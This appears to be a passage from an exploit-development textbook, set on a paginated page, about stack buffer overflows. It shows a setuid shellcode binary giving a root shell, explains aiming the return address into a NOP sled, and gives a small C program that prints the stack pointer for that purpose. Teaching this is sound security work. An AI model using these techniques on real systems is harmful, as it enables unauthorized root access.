c
#chmod u+s shellcode
#su joeuser //switch to a normal user (any)
$./shellcode
sh-2.05b#
It worked??”we got a root shell prompt.
Repeating Return Addresses
The most important element of the exploit is the return address, which must be aligned
perfectly and repeated until it overflows the saved eip value on the stack. Although it is
possible to point directly to the beginning of the shellcode, it is often much easier to be a
little sloppy and point to somewhere in the middle of the NOP sled. To do that, the first
thing you need to know is the current esp value, which points to the top of the stack. The
gcc compiler allows you to use assembly code inline and to compile programs as follows:
#include
unsigned long get_sp(void){
__asm__("movl %esp, %eax");
}
int main(){
printf("Stack pointer (ESP): 0x%x\n", get_sp());
}
# gcc -o get_sp get_sp.c
# ./get_sp
Stack pointer (ESP): 0xbffffbd8 //remember that number for later
Remember that esp value; we will use it soon as our return address, though yours will be
different.
At this point, it may be helpful to check and see if your system has Address Space Layout
Randomization (ASLR) turned on. You may check this easily by simply executing
the last program several times in a row.
Pages:
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327